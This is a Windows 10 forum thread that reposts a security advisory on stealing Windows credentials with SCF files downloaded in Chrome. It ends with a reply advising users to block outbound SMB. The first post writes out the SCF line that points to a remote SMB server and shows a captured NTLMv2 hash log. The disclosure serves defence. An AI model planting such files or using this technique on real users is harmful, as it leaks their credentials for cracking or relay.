Windows 10: Warning: Attackers can Steal Windows Credentials using Google Chrome

Discus and support Warning: Attackers can Steal Windows Credentials using Google Chrome in Windows 10 News to solve the problem; Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but... Discussion in 'Windows 10 News' started by Brink, May 16, 2017.

  1. Brink
    Brink New Member

    Warning: Attackers can Steal Windows Credentials using Google Chrome


    As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet[3] but does not give the same treatment to SCF files.

    SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example:

    Code: [Shell] IconFile=\\170.170.170.170\icon[/quote]
    Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon ".

    The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following:

    Code: [*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASHWarning: Attackers can Steal Windows Credentials using Google Chrome :Disabled LM_CLIENT_CHALLENGEWarning: Attackers can Steal Windows Credentials using Google Chrome :Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000 00000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201 ccf26d91cd9e326e00000000020000000000000000000000[/quote] The above example shows a disclosure of victim's username, domain and NTLMv2 password hash.

    It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files...

    [/quote]
    Read more: DefenseCode - Home
     
    Brink, May 16, 2017
    #1
  2. Plankton Win User

    Thanks.....I'm currently using Chrome. I already have that box checked. I will read the whole article when I get some free time. Thanks again for the heads up.

    :)
     
    Plankton, May 16, 2017
    #2
  3. This USB Device Can Steal Information, Even if PC is Locked

    http://anonhq.com/usb-device-steal-information-even-pc-locked/

    Most of you probably already know about this. But i have some questions.

    1) if no user is actively logged in (just the login screen), can the device steal credentials?

    2) If group policy blocks the installation of USB devices, can this device steal credentials?

    Thank you.
     
    LaurFlorin, May 16, 2017
    #3
  4. PJ_96 Win User

    Warning: Attackers can Steal Windows Credentials using Google Chrome

    Cannot access all google sites like gmail google search, and facebook, youtube.

    What do I do? Went through all that online forums said and still cannot get access to google and sites like gamil, facebook, youtube on all my browsers such as ie,edge, chrome, firefox.
    1. windows 10, chrome, time & date all up to date
    2. disabled all extensions on all browsers.
    3. reset all internet settings and deleted all history, caches and everything.

    4. I ran the sites in incognito but got the same error code.
    5. I ran the sites on Firefox and Edge and they cant be accessed either. No browsers can access these sities.

    6. Disabled all anti virus and firewalls on my laptop

    7. set up a new microsoft account and user on my laptop, same problem, can't access those sites only, on all browsers

    I did all those. And this is still what I get on edge

    There’s a problem with this website’s security certificate

    This might mean that someone’s trying to fool you or steal any info you send to the server. You should close this site immediately.


    L: Go to my homepage instead


    Continue to this webpage (not recommended)

    and If I continue to the webpage, it simply can't find the page

    HTTP 404 error That’s odd... Microsoft Edge can’t find this page

    Try this

    • Retype the web address
    • Go back to the last page

    This is what it shows on google chrome,

    Your connection is not private
    Attackers might be trying to steal your information from www.google.com.sg (for example, passwords, messages, or credit cards).



    NET::ERR_CERT_COMMON_NAME_

    www.google.com.sg normally uses encryption to protect your information. When Google Chrome tried to connect to www.google.com.sg this
    time, the website sent back unusual and incorrect credentials. This may happen when an attacker is trying to pretend to be www.google.com.sg, or a Wi-Fi sign-in screen has interrupted
    the connection. Your information is still secure because Google Chrome stopped the connection before any data was exchanged.

    You cannot visit www.google.com.sg right now because the website uses HSTS. Network errors and attacks are usually temporary, so this page will probably work later. Learn more.

    I am pretty sure that has to do with travelling to China and using internet there with my laptop. Since all the pages banned in China, I cant access them now too when I'm back to my home country. Can anyone explain this and what should I do??
     
    PJ_96, May 16, 2017
    #4
  5. gtspeck Win User
    Brink, thanks for the heads up...
     
    gtspeck, May 17, 2017
    #5
  6. cereberus Win User
    And here is the solution

    Block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers can not query remote SMB servers.
     
    cereberus, May 17, 2017
    #6
  7. simrick Win User
    Thanks for the heads up Brink.
     
    simrick, Apr 4, 2018
    #7
Thema:

Warning: Attackers can Steal Windows Credentials using Google Chrome

Loading...
  1. Warning: Attackers can Steal Windows Credentials using Google Chrome - Similar Threads - Warning Attackers Steal

  2. Google chrome malware attack?

    in Windows 10 Gaming
    Google chrome malware attack?: I recently been alerted by Gmail that malware on my device is viewing my data and threatening my account security. I was weird; all my accounts were blocked, and I had to change my password. So I went through the steps and installed malware detector and found these below. I...
  3. Google chrome malware attack?

    in Windows 10 Software and Apps
    Google chrome malware attack?: I recently been alerted by Gmail that malware on my device is viewing my data and threatening my account security. I was weird; all my accounts were blocked, and I had to change my password. So I went through the steps and installed malware detector and found these below. I...
  4. cannot use google chrome

    in Windows 10 Network and Sharing
    cannot use google chrome: I get this error while using Google Chrome This site can’t be reachedlogin.live.com’s server IP address could not be found.Try:Checking the proxy, firewall and secure DNS configurationRunning Windows Network DiagnosticsDNS_PROBE_FINISHED_BAD_SECURE_CONFIGTried all options,...
  5. Unable to use Google chrome

    in Windows 10 Network and Sharing
    Unable to use Google chrome: Im using Windows 10 and recently after the google experienced an outage issue on 14/12/20 , on the next day when i tried to surf in Chrome i was unable to access any web search and cant connect to YouTube gmail and many other websites. My internet connection is okay , i even...
  6. Google sent 12k warnings about government-backed attacks

    in Windows 10 News
    Google sent 12k warnings about government-backed attacks: Google sent more than 12,000 security warnings to users in 149 countries about email attacks coming from a government-backed hacking group. The number only includes alerts sent between July and September 2019 (Q3 2019), Google said in a blog post today authored by Shane...
  7. How to use Google Chrome with windows?

    in Windows 10 Customization
    How to use Google Chrome with windows?: How can I use Google Chrome with Windows. Can I only use Google Search? https://answers.microsoft.com/en-us/windows/forum/all/how-to-use-google-chrome-with-windows/36bd9f2f-af73-4efa-86ef-a884ab3d4f72
  8. Google Chrome Warning.

    in AntiVirus, Firewalls and System Security
    Google Chrome Warning.: Google Chrome users should be on the look-out for a terrifying new scam. A malicious application that disguises itself to look like the Google Chrome web browser has been discovered. Credit Card Stealer Disguises as Google Chrome Browser 79189
  9. Google Chrome under attack: Have you used 1 of these hijacked extensio

    in Browsers and Email
    Google Chrome under attack: Have you used 1 of these hijacked extensio: Google Chrome under attack: Have you used one of these hijacked extensions? Recent versions of several Chrome extensions have been compromised to spread malicious ads. Attackers have been phishing developers as a way of compromising Chrome extensions into...
  10. Windows attack can steal your logged-in username and password

    in Windows 10 News
    Windows attack can steal your logged-in username and password: A previously-disclosed flaw in Windows can allow an attacker to steal usernames and passwords of any signed-in user -- simply by tricking a user into visiting a malicious website. But now a new proof-of-exploit shows just how easy it is to steal someone's credentials....